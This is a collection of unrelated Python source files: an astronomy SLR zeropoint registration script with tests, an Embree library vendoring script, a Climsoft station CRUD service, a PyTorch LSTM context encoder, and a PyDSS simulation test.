    if options.offsetfile is None:
        parser.error('Please specify SLR offset file')
    if options.inputfile is None:
        parser.error('Please specify cat that SLR calibrated')
    # The ZPS table holds the per-filter zeropoints of the calibrated catalog.
    zplist = ldac.openObjectFile(options.inputfile, 'ZPS')
    print ' zplist["filter"]=',zplist["filter"]
    saveSlrZP(cluster = options.cluster,
              offsetFile = options.offsetfile,
              zplist = zplist,
              fluxtype = options.fluxtype,
              **options.specification)
####################################################
# User Callable Functions
####################################################
def saveSlrZP(cluster, offsetFile, zplist, photometry_db = __default_photometry_db__, fluxtype = 'APER', **specifications):
    """Register SLR zeropoint corrections in the photometry database.

    Reads per-filter (zp, zperr) offsets from `offsetFile`, adds them to the
    catalog zeropoints in `zplist`, registers each combined zeropoint, and
    then marks the registered entries as the active calibration -- including
    for filters that have no offset of their own but share an instrument and
    standard filter with one that does.

    Args (as used below):
        cluster: cluster name the calibration belongs to.
        offsetFile: whitespace-separated file; columns 1..3 of each line are
            filter name, zp offset, zp error (column 0 is ignored here).
        zplist: table-like with 'filter' and 'zeropoints' columns.
        photometry_db: object exposing registerSlrZP()/updateCalibration().
        fluxtype: flux type used to normalize bare filter names to MAG_ keys.
        **specifications: extra key=val pairs forwarded to the database calls.
    """
    offsets = {}
    input = open(offsetFile)
    for line in input.readlines():
        tokens = line.split()
        filter = tokens[1]
        zp = float(tokens[2])
        zperr = float(tokens[3])
        # Normalize bare filter names to the MAG_<fluxtype>-<filter> key form.
        if not re.match('MAG_', filter):
            filter = 'MAG_%s-%s' % (fluxtype, filter)
        offsets[filter] = (zp, zperr)
    filters = {}
    for filter, zp in zip(zplist['filter'], zplist['zeropoints']):
        if not re.match('FLUX_', filter) and not re.match('MAG_', filter):
            filter = 'MAG_%s-%s' % (fluxtype, filter)
        # FLUX_* entries are recorded under the corresponding MAG_* key.
        match = re.match('FLUX_(.*)', filter)
        if match:
            filter = 'MAG_%s' % match.group(1)
        filters[filter] = zp
    slr_offsets = {}
    for filterkey in offsets.keys():
        filter = adam_utilities.extractFullFilter(filterkey)
        #adam-SHNT# problem starts here
        try:
            # Combined zeropoint = catalog zeropoint + SLR offset.
            new_zp = filters[filterkey] + offsets[filterkey][0]
        except KeyError:
            # Diagnostic dump before re-raising: the offset file references a
            # filter that is absent from the catalog's ZPS table.
            print "filterkey=",filterkey
            print "filters.keys()=",filters.keys()
            print "offsets.keys()=",offsets.keys()
            raise
        zperr = offsets[filterkey][1]
        slrZP = photometry_db.registerSlrZP(cluster, filter = filter,
                                            zp = float(new_zp), zperr = zperr,
                                            fitFilter = filter, **specifications)
        instrument, config, chip, stdfilter = adam_utilities.parseFilter(filter)
        slr_offsets[filter] = [instrument, stdfilter, slrZP]
    for filterkey in filters.keys():
        filter = adam_utilities.extractFullFilter(filterkey)
        if filter in slr_offsets:
            slr_instrument, slr_stdfilter, slrZP = slr_offsets[filter]
            photometry_db.updateCalibration(cluster, filter = filter, calibration = slrZP, **specifications)
        else:
            # No direct offset: transfer the calibration from the first SLR
            # entry matching this filter's instrument and standard filter.
            instrument, config, chip, stdfilter = adam_utilities.parseFilter(filter)
            for slr_filterkey, (slr_instrument, slr_stdfilter, slrZP) in slr_offsets.iteritems():
                if slr_instrument == instrument and slr_stdfilter == stdfilter:
                    photometry_db.updateCalibration(cluster, filter = filter, calibration = slrZP, **specifications)
                    break
####################################################
# TESTING
####################################################
class TestingDBEntry(object):
    """Lightweight fake of a database row for unit tests.

    Keyword fields are stored in a dict and served back through
    attribute access.
    """
    def __init__(self, id, **fields):
        self.id = id
        self.fields = fields
    def __getattr__(self, name):
        # Reached only when normal attribute lookup fails (id/fields are
        # real attributes); unknown names resolve against the field dict.
        try:
            return self.fields[name]
        except KeyError:
            raise AttributeError
###
class TestingDatabase(object):
    """Fake photometry database that records registered SLR zeropoints
    and calibration updates in plain lists."""
    def __init__(self):
        self.reset()
    ###
    def reset(self):
        # Drop everything recorded so far; ids restart from zero.
        self.slr = []
        self.calibrations = []
    ###
    def registerSlrZP(self, cluster, fitFilter, zp, zperr, **specification):
        # An entry's id is simply its position in the slr list.
        entry = TestingDBEntry(
            len(self.slr),
            cluster=cluster,
            fitFilter=fitFilter,
            zp=zp,
            zperr=zperr,
            **specification)
        self.slr.append(entry)
        return entry
    ###
    def updateCalibration(self, cluster, calibration, **specification):
        record = TestingDBEntry(
            len(self.calibrations),
            cluster=cluster,
            calibration=calibration,
            **specification)
        self.calibrations.append(record)
###########
class TestSaveOffsets(unittest.TestCase):
    """Tests for saveSlrZP() using the in-memory TestingDatabase."""
    def setUp(self):
        # Fresh fake database plus a three-filter offset file on disk.
        self.db = TestingDatabase()
        raw_slr_offsets = '''V SUBARU-10_2-1-W-J-V 0.039 0.0043
MPu MEGAPRIME-0-1-u 0.195374 0.016295
WHTB WHT-0-1-B 0.516663 0.0217352
'''
        self.filternames = [ line.split()[1] for line in raw_slr_offsets.splitlines() ]
        # Random catalog zeropoints around 27 mag.
        self.orig_zps = np.random.uniform(-4, 4, size=3) + 27.
        class ZP(object):
            # Simple record of the expected post-SLR zeropoint per filter.
            def __init__(self, filter, zp, zperr):
                self.filter = filter
                self.zp = zp
                self.zperr = zperr
        self.slr_zps = {}
        for i, line in enumerate(raw_slr_offsets.splitlines()):
            tokens = line.split()
            filter = tokens[1]
            offset = float(tokens[2])
            zperr = float(tokens[3])
            # Expected combined value: catalog zeropoint + SLR offset.
            self.slr_zps[filter] = ZP(filter, self.orig_zps[i] + offset, zperr)
        self.offsetFile = 'test_save_slr.offsets'
        output = open(self.offsetFile, 'w')
        output.write(raw_slr_offsets)
        output.close()
    #######
    def tearDown(self):
        # Remove the temporary offset file written by setUp().
        if os.path.exists(self.offsetFile):
            os.remove(self.offsetFile)
    #######
    def testSaveOffsetsforSLR(self):
        """Every filter in the offset file is registered with the combined
        zeropoint and the pass-through specification keywords."""
        zplist = ldac.LDACCat(pyfits.new_table(pyfits.ColDefs([pyfits.Column(name = 'filter', format='20A',
                                                                             array = self.filternames),
                                                               pyfits.Column(name = 'zeropoints', format='E',
                                                                             array = self.orig_zps)])))
        saveSlrZP(cluster = 'testcluster', offsetFile = self.offsetFile,
                  zplist = zplist, fluxtype = 'iso', myspec = 'custom',
                  photometry_db = self.db)
        self.assertEquals(len(self.db.slr), 3)
        self.assertEquals(sorted([slr.fitFilter for slr in self.db.slr]), sorted(self.slr_zps.keys()))
        for slr in self.db.slr:
            match = self.slr_zps[slr.fitFilter]
            self.assertEquals(slr.cluster, 'testcluster')
            self.assertEquals(slr.fitFilter, match.filter)
            # float32 storage in the FITS column limits the precision here.
            self.assertTrue(np.abs(slr.zp - match.zp) < 0.001)
            self.assertTrue(np.abs(slr.zperr - match.zperr) < 0.001)
            self.assertEquals(slr.fluxtype, 'iso')
            self.assertEquals(slr.myspec, 'custom')
    #######
    def testTransferOffsets(self):
        """Filters with no direct SLR offset inherit the calibration from a
        registered filter sharing instrument and standard filter."""
        transferFilters = 'SUBARU-9-2-W-J-V SUBARU-10_1-1-W-J-V MEGAPRIME-0-1-g'.split()
        transfer_orig_zps = [23.4, 25.3, 22.4]
        # Expected source filter for each transfer (None => no match exists).
        correspondingFilters = {'SUBARU-9-2-W-J-V' : 'SUBARU-10_2-1-W-J-V',
                                'SUBARU-10_1-1-W-J-V' : 'SUBARU-10_2-1-W-J-V',
                                'MEGAPRIME-0-1-g' : None}
        filternames = self.filternames + transferFilters
        orig_zps = self.orig_zps.tolist() + transfer_orig_zps
        zplist = ldac.LDACCat(pyfits.new_table(pyfits.ColDefs([pyfits.Column(name = 'filter', format='20A',
                                                                             array = filternames),
                                                               pyfits.Column(name = 'zeropoints', format='E',
                                                                             array = orig_zps)])))
        saveSlrZP(cluster = 'testcluster', offsetFile = self.offsetFile,
                  zplist = zplist, fluxtype = 'iso', myspec = 'custom',
                  photometry_db = self.db)
        for filter in filternames:
            correspondingFilter = filter
            if filter in correspondingFilters:
                correspondingFilter = correspondingFilters[filter]
            if correspondingFilter is not None:
                # Find the SLR entry this filter should be calibrated from.
                slrmatch = None
                for slr in self.db.slr:
                    if correspondingFilter == slr.fitFilter:
                        slrmatch = slr
                        break
                self.assertTrue(slrmatch is not None)
                # And verify the recorded calibration points at that entry.
                calibmatch = None
                for calib in self.db.calibrations:
                    if filter == calib.filter:
                        calibmatch = calib
                        break
                self.assertTrue(calibmatch is not None)
                self.assertEquals(calibmatch.cluster, 'testcluster')
                self.assertEquals(calibmatch.filter, filter)
                self.assertEquals(calibmatch.fluxtype, 'iso')
                self.assertEquals(calibmatch.myspec, 'custom')
                self.assertEquals(calibmatch.calibration, slrmatch)
#################
def test():
    """Run this module's unit tests with a verbose text runner."""
    loader = unittest.TestLoader()
    cases = [TestSaveOffsets]
    suite = unittest.TestSuite(
        [loader.loadTestsFromTestCase(case) for case in cases])
    unittest.TextTestRunner(verbosity=2).run(suite)
################################
### COMMAND LINE EXECUTABLE
################################
if __name__ == '__main__':
    # 'save_slr.py test' runs the unit tests; any other invocation parses
    # the command line and saves SLR offsets via main().
    if len(sys.argv) == 2 and sys.argv[1] == 'test':
        test()
    else:
        main()
|
import glob, os, shutil, subprocess, re
# Embree source directories whose public headers are vendored into the
# thirdparty tree.
include_dirs = [
    "common/tasking",
    "kernels/bvh",
    "kernels/builders",
    "common/sys",
    "kernels",
    "kernels/common",
    "common/math",
    "common/algorithms",
    "common/lexers",
    "common/simd",
    "common/simd/arm",
    "include/embree3",
    "kernels/subdiv",
    "kernels/geometry",
]
# Translation units needed for the minimal (triangle-only, see config.h
# written below) Embree build.
cpp_files = [
    "common/sys/sysinfo.cpp",
    "common/sys/alloc.cpp",
    "common/sys/filename.cpp",
    "common/sys/library.cpp",
    "common/sys/thread.cpp",
    "common/sys/string.cpp",
    "common/sys/regression.cpp",
    "common/sys/mutex.cpp",
    "common/sys/condition.cpp",
    "common/sys/barrier.cpp",
    "common/math/constants.cpp",
    "common/simd/sse.cpp",
    "common/lexers/stringstream.cpp",
    "common/lexers/tokenstream.cpp",
    "common/tasking/taskschedulerinternal.cpp",
    "kernels/common/device.cpp",
    "kernels/common/stat.cpp",
    "kernels/common/acceln.cpp",
    "kernels/common/accelset.cpp",
    "kernels/common/state.cpp",
    "kernels/common/rtcore.cpp",
    "kernels/common/rtcore_builder.cpp",
    "kernels/common/scene.cpp",
    "kernels/common/alloc.cpp",
    "kernels/common/geometry.cpp",
    "kernels/common/scene_triangle_mesh.cpp",
    "kernels/geometry/primitive4.cpp",
    "kernels/builders/primrefgen.cpp",
    "kernels/bvh/bvh.cpp",
    "kernels/bvh/bvh_statistics.cpp",
    "kernels/bvh/bvh4_factory.cpp",
    "kernels/bvh/bvh8_factory.cpp",
    "kernels/bvh/bvh_collider.cpp",
    "kernels/bvh/bvh_rotate.cpp",
    "kernels/bvh/bvh_refit.cpp",
    "kernels/bvh/bvh_builder.cpp",
    "kernels/bvh/bvh_builder_morton.cpp",
    "kernels/bvh/bvh_builder_sah.cpp",
    "kernels/bvh/bvh_builder_sah_spatial.cpp",
    "kernels/bvh/bvh_builder_sah_mb.cpp",
    "kernels/bvh/bvh_builder_twolevel.cpp",
    "kernels/bvh/bvh_intersector1.cpp",
    "kernels/bvh/bvh_intersector1_bvh4.cpp",
]
# Re-vendor Embree: wipe thirdparty/embree, clone upstream, copy the
# selected sources/headers, and regenerate the build-time config headers.
os.chdir("../../thirdparty")
dir_name = "embree"
if os.path.exists(dir_name):
    shutil.rmtree(dir_name)
# NOTE(review): subprocess.run without check=True continues silently if the
# clone fails -- consider check=True so a network error aborts the script.
subprocess.run(["git", "clone", "https://github.com/embree/embree.git", "embree-tmp"])
os.chdir("embree-tmp")
# Record the exact upstream commit; embedded into kernels/hash.h below.
commit_hash = str(subprocess.check_output(["git", "rev-parse", "HEAD"], universal_newlines=True)).strip()
# Collect the .cpp list plus every top-level header of each include dir.
all_files = set(cpp_files)
dest_dir = os.path.join("..", dir_name)
for include_dir in include_dirs:
    headers = glob.iglob(os.path.join(include_dir, "*.h"))
    all_files.update(headers)
# Copy each file into the destination, recreating its directory structure.
for f in all_files:
    d = os.path.join(dest_dir, os.path.dirname(f))
    if not os.path.exists(d):
        os.makedirs(d)
    shutil.copy2(f, d)
# kernels/hash.h: normally produced by CMake; pins the vendored commit.
with open(os.path.join(dest_dir, "kernels/hash.h"), "w") as hash_file:
    hash_file.write(
        f"""
// Copyright 2009-2020 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
#define RTC_HASH "{commit_hash}"
"""
    )
# kernels/config.h: feature selection -- only triangle geometry and filter
# functions are enabled; everything else is compiled out.
with open(os.path.join(dest_dir, "kernels/config.h"), "w") as config_file:
    config_file.write(
        """
// Copyright 2009-2020 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
/* #undef EMBREE_RAY_MASK */
/* #undef EMBREE_STAT_COUNTERS */
/* #undef EMBREE_BACKFACE_CULLING */
/* #undef EMBREE_BACKFACE_CULLING_CURVES */
#define EMBREE_FILTER_FUNCTION
/* #undef EMBREE_IGNORE_INVALID_RAYS */
#define EMBREE_GEOMETRY_TRIANGLE
/* #undef EMBREE_GEOMETRY_QUAD */
/* #undef EMBREE_GEOMETRY_CURVE */
/* #undef EMBREE_GEOMETRY_SUBDIVISION */
/* #undef EMBREE_GEOMETRY_USER */
/* #undef EMBREE_GEOMETRY_INSTANCE */
/* #undef EMBREE_GEOMETRY_GRID */
/* #undef EMBREE_GEOMETRY_POINT */
/* #undef EMBREE_RAY_PACKETS */
/* #undef EMBREE_COMPACT_POLYS */
#define EMBREE_CURVE_SELF_INTERSECTION_AVOIDANCE_FACTOR 2.0
#if defined(EMBREE_GEOMETRY_TRIANGLE)
  #define IF_ENABLED_TRIS(x) x
#else
  #define IF_ENABLED_TRIS(x)
#endif
#if defined(EMBREE_GEOMETRY_QUAD)
  #define IF_ENABLED_QUADS(x) x
#else
  #define IF_ENABLED_QUADS(x)
#endif
#if defined(EMBREE_GEOMETRY_CURVE) || defined(EMBREE_GEOMETRY_POINT)
  #define IF_ENABLED_CURVES_OR_POINTS(x) x
#else
  #define IF_ENABLED_CURVES_OR_POINTS(x)
#endif
#if defined(EMBREE_GEOMETRY_CURVE)
  #define IF_ENABLED_CURVES(x) x
#else
  #define IF_ENABLED_CURVES(x)
#endif
#if defined(EMBREE_GEOMETRY_POINT)
  #define IF_ENABLED_POINTS(x) x
#else
  #define IF_ENABLED_POINTS(x)
#endif
#if defined(EMBREE_GEOMETRY_SUBDIVISION)
  #define IF_ENABLED_SUBDIV(x) x
#else
  #define IF_ENABLED_SUBDIV(x)
#endif
#if defined(EMBREE_GEOMETRY_USER)
  #define IF_ENABLED_USER(x) x
#else
  #define IF_ENABLED_USER(x)
#endif
#if defined(EMBREE_GEOMETRY_INSTANCE)
  #define IF_ENABLED_INSTANCE(x) x
#else
  #define IF_ENABLED_INSTANCE(x)
#endif
#if defined(EMBREE_GEOMETRY_GRID)
  #define IF_ENABLED_GRIDS(x) x
#else
  #define IF_ENABLED_GRIDS(x)
#endif
"""
    )
# Extract the Embree version from the upstream CMakeLists.txt.
with open("CMakeLists.txt", "r") as cmake_file:
    cmake_content = cmake_file.read()
    major_version = int(re.compile(r"EMBREE_VERSION_MAJOR\s(\d+)").findall(cmake_content)[0])
    minor_version = int(re.compile(r"EMBREE_VERSION_MINOR\s(\d+)").findall(cmake_content)[0])
    patch_version = int(re.compile(r"EMBREE_VERSION_PATCH\s(\d+)").findall(cmake_content)[0])
# rtcore_config.h: static-library configuration with the detected version.
with open(os.path.join(dest_dir, "include/embree3/rtcore_config.h"), "w") as config_file:
    config_file.write(
        f"""
// Copyright 2009-2021 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
#pragma once
#define RTC_VERSION_MAJOR {major_version}
#define RTC_VERSION_MINOR {minor_version}
#define RTC_VERSION_PATCH {patch_version}
#define RTC_VERSION {major_version}{minor_version:02d}{patch_version:02d}
#define RTC_VERSION_STRING "{major_version}.{minor_version}.{patch_version}"
#define RTC_MAX_INSTANCE_LEVEL_COUNT 1
#define EMBREE_MIN_WIDTH 0
#define RTC_MIN_WIDTH EMBREE_MIN_WIDTH
#define EMBREE_STATIC_LIB
/* #undef EMBREE_API_NAMESPACE */
#if defined(EMBREE_API_NAMESPACE)
#  define RTC_NAMESPACE
#  define RTC_NAMESPACE_BEGIN namespace {{
#  define RTC_NAMESPACE_END }}
#  define RTC_NAMESPACE_USE using namespace ;
#  define RTC_API_EXTERN_C
#  undef EMBREE_API_NAMESPACE
#else
#  define RTC_NAMESPACE_BEGIN
#  define RTC_NAMESPACE_END
#  define RTC_NAMESPACE_USE
#  if defined(__cplusplus)
#    define RTC_API_EXTERN_C extern "C"
#  else
#    define RTC_API_EXTERN_C
#  endif
#endif
#if defined(ISPC)
#  define RTC_API_IMPORT extern "C" unmasked
#  define RTC_API_EXPORT extern "C" unmasked
#elif defined(EMBREE_STATIC_LIB)
#  define RTC_API_IMPORT RTC_API_EXTERN_C
#  define RTC_API_EXPORT RTC_API_EXTERN_C
#elif defined(_WIN32)
#  define RTC_API_IMPORT RTC_API_EXTERN_C __declspec(dllimport)
#  define RTC_API_EXPORT RTC_API_EXTERN_C __declspec(dllexport)
#else
#  define RTC_API_IMPORT RTC_API_EXTERN_C
#  define RTC_API_EXPORT RTC_API_EXTERN_C __attribute__ ((visibility ("default")))
#endif
#if defined(RTC_EXPORT_API)
#  define RTC_API RTC_API_EXPORT
#else
#  define RTC_API RTC_API_IMPORT
#endif
"""
    )
# Done: drop the temporary clone, leaving only thirdparty/embree.
os.chdir("..")
shutil.rmtree("embree-tmp")
|
<reponame>opencdms/opencdms-api<filename>src/apps/climsoft/services/station_service.py
import logging
from typing import List
from sqlalchemy.orm.session import Session
from opencdms.models.climsoft import v4_1_1_core as models
from apps.climsoft.schemas import station_schema
from fastapi.exceptions import HTTPException
# Module logger; basicConfig here makes exception logs visible even when
# the application does not configure logging itself.
logger = logging.getLogger("ClimsoftStationService")
logging.basicConfig(level=logging.INFO)
class FailedCreatingStation(Exception):
    """Raised when inserting a new station row fails."""
    pass
class FailedGettingStation(Exception):
    """Raised when fetching a single station fails unexpectedly."""
    pass
class FailedGettingStationList(Exception):
    """Raised when the station list query fails."""
    pass
class FailedUpdatingStation(Exception):
    """Raised when updating a station row fails."""
    pass
class FailedDeletingStation(Exception):
    """Raised when deleting a station row fails."""
    pass
class StationDoesNotExist(Exception):
    """Lookup of a non-existent station (not raised in this module's
    visible code; get() uses HTTPException(404) instead)."""
    pass
def create(db_session: Session, data: station_schema.CreateStation) -> station_schema.Station:
    """Insert a new station row and return it as a schema object.

    Rolls the session back, logs, and raises FailedCreatingStation on
    any error.
    """
    try:
        station_row = models.Station(**data.dict())
        db_session.add(station_row)
        db_session.commit()
        result = station_schema.Station.from_orm(station_row)
    except Exception as e:
        db_session.rollback()
        logger.exception(e)
        raise FailedCreatingStation("Failed creating station.")
    return result
def get(db_session: Session, station_id: str) -> station_schema.Station:
    """Fetch one station by its id.

    Raises HTTPException(404) when no row matches, and
    FailedGettingStation for any other error.
    """
    try:
        row = (db_session.query(models.Station)
               .filter_by(stationId=station_id)
               .first())
        if not row:
            raise HTTPException(status_code=404, detail="Station does not exist.")
        return station_schema.Station.from_orm(row)
    except HTTPException:
        # The 404 passes through untouched.
        raise
    except Exception as e:
        logger.exception(e)
        raise FailedGettingStation("Failed getting station.")
def query(
        db_session: Session,
        station_id: str = None,
        station_name: str = None,
        wmoid: str = None,
        icaoid: str = None,
        latitude: float = None,
        longitude: float = None,
        qualifier: str = None,
        elevation: str = None,
        geolocation_method: str = None,
        geolocation_accuracy: str = None,
        opening_datetime: str = None,
        closing_datetime: str = None,
        country: str = None,
        authority: str = None,
        admin_region: str = None,
        drainage_basin: str = None,
        waca_selection: bool = None,
        cpt_selection: bool = None,
        station_operational: bool = None,
        limit: int = 25,
        offset: int = 0
) -> List[station_schema.Station]:
    """
    This function builds a query based on the given parameters and returns `limit` numbers of `station` rows skipping
    `offset` number of rows

    :param db_session: sqlalchemy database session
    :param station_id: compares with `stationId` for an exact match
    :param station_name: compares with `stationName` for an exact match
    :param wmoid: compares with `wmoid` for an exact match
    :param icaoid: compares with `icaoid` for an exact match
    :param latitude: return items with greater or equal latitude
    :param longitude: return items with greater or equal longitude
    :param qualifier: checks if qualifier column contains given input
    :param elevation: checks if elevation column contains given input
    :param geolocation_method: checks if geolocation method column contains given input
    :param geolocation_accuracy: return items with greater or equal geolocation accuracy
    :param opening_datetime: return items with greater or equal for `openingDatetime` column
    :param closing_datetime: return items with smaller or equal for `closingDatetime` column
    :param country: compares with `country` for an exact match
    :param authority: compares with `authority` for an exact match
    :param admin_region: compares with `adminRegion` for an exact match
    :param drainage_basin: compares with `drainageBasin` for an exact match
    :param waca_selection: compares with `wacaSelection` for an exact match
    :param cpt_selection: compares with `cptSelection` for an exact match
    :param station_operational: compares with `stationOperational` for an exact match
    :param limit: describes page size
    :param offset: describe how many to skip
    :return: list of `station`
    """
    try:
        q = db_session.query(models.Station)
        if station_id is not None:
            q = q.filter_by(stationId=station_id)
        if station_name is not None:
            q = q.filter_by(stationName=station_name)
        if wmoid is not None:
            q = q.filter_by(wmoid=wmoid)
        if icaoid is not None:
            q = q.filter_by(icaoid=icaoid)
        if latitude is not None:
            q = q.filter(models.Station.latitude >= latitude)
        if longitude is not None:
            q = q.filter(models.Station.longitude >= longitude)
        if qualifier is not None:
            q = q.filter(models.Station.qualifier.ilike(f"%{qualifier}%"))
        if elevation is not None:
            q = q.filter(models.Station.elevation.ilike(f"%{elevation}%"))
        if geolocation_accuracy is not None:
            q = q.filter(models.Station.geoLocationAccuracy >= geolocation_accuracy)
        if geolocation_method is not None:
            q = q.filter(models.Station.geoLocationMethod.ilike(f"%{geolocation_method}%"))
        if opening_datetime is not None:
            q = q.filter(models.Station.openingDatetime >= opening_datetime)
        if closing_datetime is not None:
            q = q.filter(models.Station.closingDatetime <= closing_datetime)
        if country is not None:
            # Fix: was filter_by(contry=country), a typo that made the
            # country filter always fail.
            q = q.filter_by(country=country)
        if authority is not None:
            q = q.filter_by(authority=authority)
        if admin_region is not None:
            q = q.filter_by(adminRegion=admin_region)
        if drainage_basin is not None:
            q = q.filter_by(drainageBasin=drainage_basin)
        if waca_selection is not None:
            q = q.filter_by(wacaSelection=waca_selection)
        if cpt_selection is not None:
            # Fix: was comparing against waca_selection (copy-paste bug).
            q = q.filter_by(cptSelection=cpt_selection)
        if station_operational is not None:
            # Fix: was comparing against waca_selection (copy-paste bug).
            q = q.filter_by(stationOperational=station_operational)
        return [station_schema.Station.from_orm(s) for s in q.offset(offset).limit(limit).all()]
    except Exception as e:
        logger.exception(e)
        raise FailedGettingStationList("Failed getting station list.")
def update(db_session: Session, station_id: str, updates: station_schema.UpdateStation) -> station_schema.Station:
    """Apply `updates` to the station identified by `station_id` and
    return the refreshed row.

    Rolls back, logs, and raises FailedUpdatingStation on any error.
    """
    try:
        (db_session.query(models.Station)
         .filter_by(stationId=station_id)
         .update(updates.dict()))
        db_session.commit()
        # Re-read the row so the returned schema reflects committed state.
        refreshed = db_session.query(models.Station).filter_by(stationId=station_id).first()
        return station_schema.Station.from_orm(refreshed)
    except Exception as e:
        db_session.rollback()
        logger.exception(e)
        raise FailedUpdatingStation("Failed updating station")
def delete(db_session: Session, station_id: str) -> bool:
    """Delete the station with the given id and return True.

    Rolls back, logs, and raises FailedDeletingStation on any error.
    """
    try:
        db_session.query(models.Station).filter_by(stationId=station_id).delete()
        db_session.commit()
    except Exception as e:
        db_session.rollback()
        logger.exception(e)
        raise FailedDeletingStation("Failed deleting station.")
    return True
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
from copy import deepcopy
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence
class ContextEncoder(nn.Module):
    """Bidirectional LSTM encoders for pre- and post-context sequences.

    Each context is encoded separately; the forward/backward final states
    are concatenated per context, the pre/post results are concatenated
    again, and linear projections map them back to `hidden_size`.
    """
    def __init__(self,
                 input_size,
                 hidden_size,
                 wordEmbed,
                 drop_out=0.1,
                 pack_sequence=True):
        """Initialize Context Encoder
        Args:
            input_size: input embedding size.
            hidden_size: LSTM hidden size.
            wordEmbed: nn.Module, embedding layer.
            drop_out: dropout probability applied to the projected states.
            pack_sequence: if True, pack padded sequences before the LSTM.
        """
        super(ContextEncoder, self).__init__()
        self.word_embed = wordEmbed  # embedding layer
        self.pack_sequence = pack_sequence
        self.pre_rnn = nn.LSTM(input_size,
                               hidden_size,
                               batch_first=True,
                               bidirectional=True)
        # Separate, identically configured LSTM for the post-context.
        self.pos_rnn = deepcopy(self.pre_rnn)
        # Projection input is 2 directions x 2 contexts x hidden_size.
        self.output_cproj = nn.Linear(hidden_size*4, hidden_size)
        self.output_hproj = deepcopy(self.output_cproj)
        self.tanh = nn.Tanh()
        self.dropout = nn.Dropout(p=drop_out)
    def _encode(self, inputs, seq_lens=None, rnn=None):
        """Run one context through an LSTM and return its final (h, c).
        Args:
            inputs: [batch, seq_len, embedding_dim]
            seq_lens: [batch] true lengths, or None to skip packing.
            rnn: which LSTM to use; defaults to self.pre_rnn.
        Returns:
            (h, c), each [batch, 2*hidden], in the original batch order.
        """
        if rnn is None:
            rnn = self.pre_rnn
        if seq_lens is not None and self.pack_sequence:
            # pack_padded_sequence needs length-sorted input; remember the
            # permutation so batch order can be restored afterwards.
            lens_sorted, idx_sort = torch.sort(seq_lens, dim=0, descending=True)
            _, idx_unsort = torch.sort(idx_sort, dim=0)
            packed = pack_padded_sequence(inputs.index_select(0, idx_sort),
                                          lens_sorted, batch_first=True)
            # (h, c): ([2, batch, hidden], [2, batch, hidden])
            _, (h, c) = rnn(packed)
            h = torch.cat((h[0], h[1]), -1).index_select(0, idx_unsort)
            c = torch.cat((c[0], c[1]), -1).index_select(0, idx_unsort)
        else:
            # Fix: the original referenced idx_unsort on this path even
            # though no sort had been done, raising NameError whenever
            # seq_lens was None or pack_sequence was False.
            _, (h, c) = rnn(inputs)
            h = torch.cat((h[0], h[1]), -1)
            c = torch.cat((c[0], c[1]), -1)
        return h, c
    def forward(self, _pre, _pos):
        """Encoding context sequences.
        Args:
            _pre: (prec_word_ids, prec_seq_lens, prec_char_ids, prec_word_lens)
            _pos: (posc_word_ids, posc_seq_lens, posc_char_ids, posc_word_lens)
        """
        prec_word_ids, prec_seq_lens, prec_char_ids, prec_word_lens = _pre
        posc_word_ids, posc_seq_lens, posc_char_ids, posc_word_lens = _pos
        # [batch, max_seq_len, word_dim + char_hidden]
        embed_pre = self.word_embed(prec_word_ids, prec_char_ids, prec_word_lens)
        embed_pos = self.word_embed(posc_word_ids, posc_char_ids, posc_word_lens)
        pre_h, pre_c = self._encode(embed_pre, prec_seq_lens)
        # Fix: the post-context now runs through pos_rnn, which was created
        # in __init__ but never used (both contexts went through pre_rnn).
        # NOTE(review): this changes outputs vs. checkpoints trained with
        # the old behavior -- confirm before loading old weights.
        pos_h, pos_c = self._encode(embed_pos, posc_seq_lens, rnn=self.pos_rnn)
        # final projected states: [batch_size, hidden]
        h_cat = self.tanh(self.output_hproj(torch.cat((pre_h, pos_h), 1)))
        c_cat = self.tanh(self.output_cproj(torch.cat((pre_c, pos_c), 1)))
        h_cat, c_cat = self.dropout(h_cat), self.dropout(c_cat)
        return h_cat, c_cat
|
"""Tests local execution of a snapshot simulation."""
import os
import shutil
import pandas as pd
import pytest
from jade.result import ResultsSummary
from jade.utils.subprocess_manager import run_command
from disco.extensions.pydss_simulation.pydss_configuration import PyDssConfiguration
from disco.extensions.pydss_simulation.pydss_inputs import PyDssInputs
from disco.extensions.pydss_simulation.pydss_simulation import PyDssSimulation
from disco.pydss.pydss_analysis import PyDssAnalysis
from tests.common import *
def test_pydss_simulation(cleanup):
    """End-to-end snapshot run: transform source models, configure jobs,
    submit locally with a fake HPC, then spot-check the PyDSS results."""
    # Force local execution even when running on an NREL cluster node.
    if "NREL_CLUSTER" in os.environ:
        os.environ.pop("NREL_CLUSTER")
    os.environ["FAKE_HPC_CLUSTER"] = "True"
    num_jobs = 4
    defaults_cmd = f"{TRANSFORM_DEFAULTS} tests/data/smart-ds SnapshotImpactAnalysis -c {TRANSFORM_CONFIG}"
    transform_cmd = f"{TRANSFORM_JOBS} {TRANSFORM_CONFIG} -f -o {MODELS_DIR}"
    config_cmd = f"{CONFIG_JOBS} snapshot-impact-analysis {MODELS_DIR} -c {CONFIG_FILE}"
    submit_cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -p 1"
    # Each CLI stage must succeed before results are checked.
    assert run_command(defaults_cmd) == 0
    assert run_command(transform_cmd) == 0
    assert run_command(config_cmd) == 0
    assert run_command(submit_cmd) == 0
    verify_results(OUTPUT, num_jobs)
    # Inspect the stored PyDSS results of the first job.
    config = PyDssConfiguration.deserialize(CONFIG_FILE)
    analysis = PyDssAnalysis(OUTPUT, config)
    result = analysis.list_results()[0]
    pydss_results = analysis.read_results(result.name)
    assert len(pydss_results.scenarios) == 1
    scenario = pydss_results.scenarios[0]
    lines = scenario.list_element_names("Lines", "Currents")
    df = scenario.get_dataframe("Lines", "Currents", lines[0])
    assert isinstance(df, pd.DataFrame)
    # A snapshot simulation yields exactly one time point.
    assert len(df) == 1
    element_info_files = scenario.list_element_info_files()
    assert element_info_files
    transformer_warehouse = scenario.read_element_info_file("TransformersPhase")
    assert isinstance(transformer_warehouse, pd.DataFrame)
    assert len(transformer_warehouse) > 0
    # TODO: the test circuit doesn't currently produce anything for these,
    # so only exercise the readers without asserting on their content.
    capacitor_changes = scenario.read_capacitor_changes()
    #assert capacitor_changes
    event_log = scenario.read_event_log()
    #assert event_log
def verify_results(output_dir, num_jobs):
